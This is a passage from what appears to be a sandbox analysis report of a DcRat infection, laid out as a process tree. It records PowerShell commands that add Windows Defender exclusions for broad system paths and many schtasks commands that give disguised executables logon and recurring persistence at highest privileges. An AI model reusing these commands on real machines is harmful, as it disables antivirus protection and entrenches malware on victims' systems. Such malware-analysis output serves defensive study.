                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:2792
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              7⤵
                                                                                                                                                                PID:2112
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                                                                              6⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:4776
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                                                                              6⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:4840
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                                                                              6⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:3576
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:2820
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
                                                                                                                                                                6⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:1876
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msiexec.exe'
                                                                                                                                                                6⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:1176
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
                                                                                                                                                                6⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:5440
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kuNVXoYm1g.bat"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:2488
                                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                                    chcp 65001
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:4464
                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                      ping -n 10 localhost
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:4028
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:1984
                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                          1⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:1172
                                                                                                                                                          • C:\Windows\System32\MsiExec.exe
                                                                                                                                                            C:\Windows\System32\MsiExec.exe -Embedding F30DD0CAE4C7732765273216C88D2CE5
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:3116
                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding EC49B12F580CBFBA323FD802A3571F33
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:4080
                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 29748A96FDF1E729166492EE12C50F35 E Global\MSI0000
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:5504
                                                                                                                                                            • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                              "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5048
                                                                                                                                                                • C:\Windows\System32\wevtutil.exe
                                                                                                                                                                  "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4788
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Registry.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2284
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3124
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:808
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\RuntimeBroker.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1456
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1760
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:232
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:864
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:4880
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3792
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\SppExtComObj.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4592
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\SppExtComObj.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4388
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\SppExtComObj.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4696
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3808
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4800
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\PrintDialog\Assets\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4064
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Default\My Documents\sppsvc.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4388
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\My Documents\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2736
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Users\Default\My Documents\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4460
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\winNet\csrss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1992
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3232
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4964
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3012
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1896
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1692
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\msiexec.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3240
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\SystemTemp\Crashpad\reports\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1980
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3636
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\winNet\dllhost.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1284
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\winNet\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4956
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\winNet\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2908
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 7 /tr "'C:\winNet\msiexec.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1932
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\winNet\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1952
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\winNet\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4736
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4464
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2236
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4548
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:5028
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3936
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:700
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\wscript.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1684
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\wscript.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2128
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\wscript.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1148
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\winNet\RuntimeBroker.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4764
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\winNet\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2440
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\winNet\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2248
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\SearchHost.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2488
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\SearchHost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3084
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\SearchHost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4776
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Bloxstrap.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2436
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\Users\Admin\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1316
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1380
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\winNet\sihost.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4328
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\winNet\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1292
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\winNet\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1760
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\Offline\Idle.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2848
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\Offline\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1876
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Update\Offline\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2080
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Videos\OfficeClickToRun.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3372
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\Videos\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:4428
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Videos\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4880
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
